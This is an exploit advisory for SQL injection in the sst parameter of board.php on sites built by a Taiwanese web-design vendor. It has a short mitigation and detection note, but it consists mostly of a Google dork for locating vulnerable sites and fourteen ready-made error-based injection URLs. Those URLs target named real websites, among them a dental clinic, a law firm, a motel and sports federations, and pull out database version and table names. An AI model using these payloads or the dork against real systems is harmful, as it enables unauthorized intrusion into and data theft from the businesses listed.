######################
# Exploit Title : Design By 種籽網頁設計 SQL injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.e-seed.com.tw/
# Google Dork : site:.tw inurl:board.php? stx=
# Date: 26 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
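# Admin page : target/adm/
#
# Affected : bbs/board.php, sst (sort field) request parameter.
#   In the demos below the sst value appears to reach the query's ORDER BY
#   clause without validation, so the appended subquery is executed and its
#   result comes back inside the MySQL duplicate-entry error message.
# Mitigation : accept only known column names for sst and asc/desc for sod
#   (allowlist), and do not return database error text to the client.
# Detection : requests to board.php whose sst value contains
#   INFORMATION_SCHEMA or FLOOR(RAND(0)*2) match the pattern shown below.
#
# Demos :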
# http://www.chain-dent.com.tw/bbs/board.php?bo_table=dental&page=1&sfl=1'&sod=desc&sop=and&sst=40(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(table_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+-
# http://sun-wang.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://hsu-design.com/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://pentathlon.org.tw/bbs/board.php?bo_table=links&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.shootingsport.org.tw/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.in-motel.com.tw/bbs/board.php?bo_table=room&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.flower888.com.tw/bbs/board.php?bo_table=special&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.tw-sd.com/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.su-attorneys.com.tw/bbs/board.php?bo_table=legal&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.wtd.com.tw/bbs/board.php?bo_table=building&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://home-light.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.cscsignal.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
######################
# discovered by : modiret
######################